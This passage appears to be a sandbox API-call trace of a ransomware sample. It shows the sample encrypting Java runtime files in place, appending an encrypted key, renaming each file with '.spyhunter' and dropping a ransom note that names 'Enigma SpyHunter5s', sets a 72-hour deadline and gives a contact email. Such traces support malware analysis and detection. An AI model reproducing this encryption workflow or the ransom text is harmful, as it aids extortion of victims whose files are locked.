pbData=0x31f110*, pdwDataLen=0x25ce440*=0x30) returned 1 [0172.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0172.058] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties") returned 73 [0172.058] StrStrW (lpFirst="messages_zh_HK.properties", lpSrch=".txt") returned 0x0 [0172.058] GetProcessHeap () returned 0x2c0000 [0172.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0172.058] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce404, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce404*=0xea8, lpOverlapped=0x0) returned 1 [0172.141] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff158, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.141] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xea8, lpNumberOfBytesWritten=0x25ce404, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce404*=0xea8, lpOverlapped=0x0) returned 1 [0172.142] GetProcessHeap () returned 0x2c0000 [0172.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0172.142] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.142] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce444*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce404, lpOverlapped=0x0 | out: lpBuffer=0x25ce444*, lpNumberOfBytesWritten=0x25ce404*=0x4, lpOverlapped=0x0) returned 1 [0172.142] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce404, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce404*=0x30, lpOverlapped=0x0) returned 1 [0172.142] CloseHandle (hObject=0x9c) returned 1 [0172.142] GetProcessHeap () returned 0x2c0000 [0172.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.142] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties.spyhunter") returned 83 [0172.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_hk.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_HK.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_hk.properties.spyhunter")) returned 1 [0172.144] GetProcessHeap () returned 0x2c0000 [0172.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.145] GetProcessHeap () returned 0x2c0000 [0172.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0172.145] GetProcessHeap () returned 0x2c0000 [0172.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee48d0 | out: hHeap=0x2c0000) returned 1 [0172.145] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce440 | out: pbBuffer=0x25ce440) returned 1 [0172.145] GetProcessHeap () returned 0x2c0000 [0172.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0172.145] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce438*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce438*=0x30) returned 1 [0172.145] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0172.146] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties") returned 73 [0172.146] StrStrW (lpFirst="messages_pt_BR.properties", lpSrch=".txt") returned 0x0 [0172.146] GetProcessHeap () returned 0x2c0000 [0172.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0172.146] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3fc*=0xd14, lpOverlapped=0x0) returned 1 [0172.189] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff2ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.189] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd14, lpNumberOfBytesWritten=0x25ce3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3fc*=0xd14, lpOverlapped=0x0) returned 1 [0172.189] GetProcessHeap () returned 0x2c0000 [0172.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0172.198] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.198] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce43c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3fc, lpOverlapped=0x0 | out: lpBuffer=0x25ce43c*, lpNumberOfBytesWritten=0x25ce3fc*=0x4, lpOverlapped=0x0) returned 1 [0172.198] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3fc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3fc*=0x30, lpOverlapped=0x0) returned 1 [0172.198] CloseHandle (hObject=0x9c) returned 1 [0172.199] GetProcessHeap () returned 0x2c0000 [0172.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.199] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties.spyhunter") returned 83 [0172.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_pt_br.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_pt_br.properties.spyhunter")) returned 1 [0172.204] GetProcessHeap () returned 0x2c0000 [0172.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.204] GetProcessHeap () returned 0x2c0000 [0172.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0172.204] GetProcessHeap () returned 0x2c0000 [0172.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4a90 | out: hHeap=0x2c0000) returned 1 [0172.205] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce440 | out: pbBuffer=0x25ce440) returned 1 [0172.205] GetProcessHeap () returned 0x2c0000 [0172.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0172.205] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce438*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce438*=0x30) returned 1 [0172.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0172.214] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties") returned 70 [0172.214] StrStrW (lpFirst="messages_fr.properties", lpSrch=".txt") returned 0x0 [0172.214] GetProcessHeap () returned 0x2c0000 [0172.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0172.214] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3fc*=0xd51, lpOverlapped=0x0) returned 1 [0172.297] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff2af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.297] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd51, lpNumberOfBytesWritten=0x25ce3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3fc*=0xd51, lpOverlapped=0x0) returned 1 [0172.298] GetProcessHeap () returned 0x2c0000 [0172.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0172.298] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.298] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce43c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3fc, lpOverlapped=0x0 | out: lpBuffer=0x25ce43c*, lpNumberOfBytesWritten=0x25ce3fc*=0x4, lpOverlapped=0x0) returned 1 [0172.298] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3fc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3fc*=0x30, lpOverlapped=0x0) returned 1 [0172.298] CloseHandle (hObject=0x9c) returned 1 [0172.298] GetProcessHeap () returned 0x2c0000 [0172.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.298] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties.spyhunter") returned 80 [0172.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_fr.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_fr.properties.spyhunter")) returned 1 [0172.299] GetProcessHeap () returned 0x2c0000 [0172.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.300] GetProcessHeap () returned 0x2c0000 [0172.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0172.300] GetProcessHeap () returned 0x2c0000 [0172.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c7c8 | out: hHeap=0x2c0000) returned 1 [0172.300] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce438 | out: pbBuffer=0x25ce438) returned 1 [0172.300] GetProcessHeap () returned 0x2c0000 [0172.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0172.300] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce430*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce430*=0x30) returned 1 [0172.300] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0172.301] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties") returned 70 [0172.301] StrStrW (lpFirst="messages_de.properties", lpSrch=".txt") returned 0x0 [0172.301] GetProcessHeap () returned 0x2c0000 [0172.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0172.301] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3f4*=0xcea, lpOverlapped=0x0) returned 1 [0172.364] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff316, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.365] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xcea, lpNumberOfBytesWritten=0x25ce3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3f4*=0xcea, lpOverlapped=0x0) returned 1 [0172.365] GetProcessHeap () returned 0x2c0000 [0172.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0172.365] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.365] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3f4, lpOverlapped=0x0 | out: lpBuffer=0x25ce434*, lpNumberOfBytesWritten=0x25ce3f4*=0x4, lpOverlapped=0x0) returned 1 [0172.365] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3f4*=0x30, lpOverlapped=0x0) returned 1 [0172.365] CloseHandle (hObject=0x9c) returned 1 [0172.365] GetProcessHeap () returned 0x2c0000 [0172.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.365] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties.spyhunter") returned 80 [0172.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_de.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_de.properties.spyhunter")) returned 1 [0172.366] GetProcessHeap () returned 0x2c0000 [0172.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.366] GetProcessHeap () returned 0x2c0000 [0172.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0172.366] GetProcessHeap () returned 0x2c0000 [0172.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c618 | out: hHeap=0x2c0000) returned 1 [0172.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce438 | out: pbBuffer=0x25ce438) returned 1 [0172.366] GetProcessHeap () returned 0x2c0000 [0172.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0172.366] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce430*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce430*=0x30) returned 1 [0172.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqs.conf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0172.367] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf") returned 60 [0172.367] StrStrW (lpFirst="jqs.conf", lpSrch=".txt") returned 0x0 [0172.367] GetProcessHeap () returned 0x2c0000 [0172.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0172.367] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3f4*=0x2800, lpOverlapped=0x0) returned 1 [0172.470] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.470] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3f4*=0x2800, lpOverlapped=0x0) returned 1 [0172.470] GetProcessHeap () returned 0x2c0000 [0172.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0172.470] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.470] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3f4, lpOverlapped=0x0 | out: lpBuffer=0x25ce434*, lpNumberOfBytesWritten=0x25ce3f4*=0x4, lpOverlapped=0x0) returned 1 [0172.559] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3f4*=0x30, lpOverlapped=0x0) returned 1 [0172.559] CloseHandle (hObject=0x9c) returned 1 [0172.559] GetProcessHeap () returned 0x2c0000 [0172.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.560] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf.spyhunter") returned 70 [0172.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqs.conf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqs.conf.spyhunter")) returned 1 [0172.561] GetProcessHeap () returned 0x2c0000 [0172.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.561] GetProcessHeap () returned 0x2c0000 [0172.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0172.561] GetProcessHeap () returned 0x2c0000 [0172.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf7b8 | out: hHeap=0x2c0000) returned 1 [0172.562] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce430 | out: pbBuffer=0x25ce430) returned 1 [0172.562] GetProcessHeap () returned 0x2c0000 [0172.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0172.562] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce428*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce428*=0x30) returned 1 [0172.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\content-types.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0172.563] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties") returned 65 [0172.563] StrStrW (lpFirst="content-types.properties", lpSrch=".txt") returned 0x0 [0172.563] GetProcessHeap () returned 0x2c0000 [0172.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0172.563] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3ec*=0x15ac, lpOverlapped=0x0) returned 1 [0172.630] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffea54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.630] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15ac, lpNumberOfBytesWritten=0x25ce3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3ec*=0x15ac, lpOverlapped=0x0) returned 1 [0172.630] GetProcessHeap () returned 0x2c0000 [0172.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0172.630] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.630] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce42c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3ec, lpOverlapped=0x0 | out: lpBuffer=0x25ce42c*, lpNumberOfBytesWritten=0x25ce3ec*=0x4, lpOverlapped=0x0) returned 1 [0172.630] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3ec*=0x30, lpOverlapped=0x0) returned 1 [0172.630] CloseHandle (hObject=0x9c) returned 1 [0172.630] GetProcessHeap () returned 0x2c0000 [0172.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.631] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties.spyhunter") returned 75 [0172.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\content-types.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\content-types.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\content-types.properties.spyhunter")) returned 1 [0172.632] GetProcessHeap () returned 0x2c0000 [0172.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.632] GetProcessHeap () returned 0x2c0000 [0172.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0172.632] GetProcessHeap () returned 0x2c0000 [0172.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e038e8 | out: hHeap=0x2c0000) returned 1 [0172.632] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0172.638] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0172.638] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce363*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x25ce363*, lpNumberOfBytesWritten=0x25ce48c*=0x127, lpOverlapped=0x0) returned 1 [0172.639] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0172.639] WriteFile (in: hFile=0x9c, 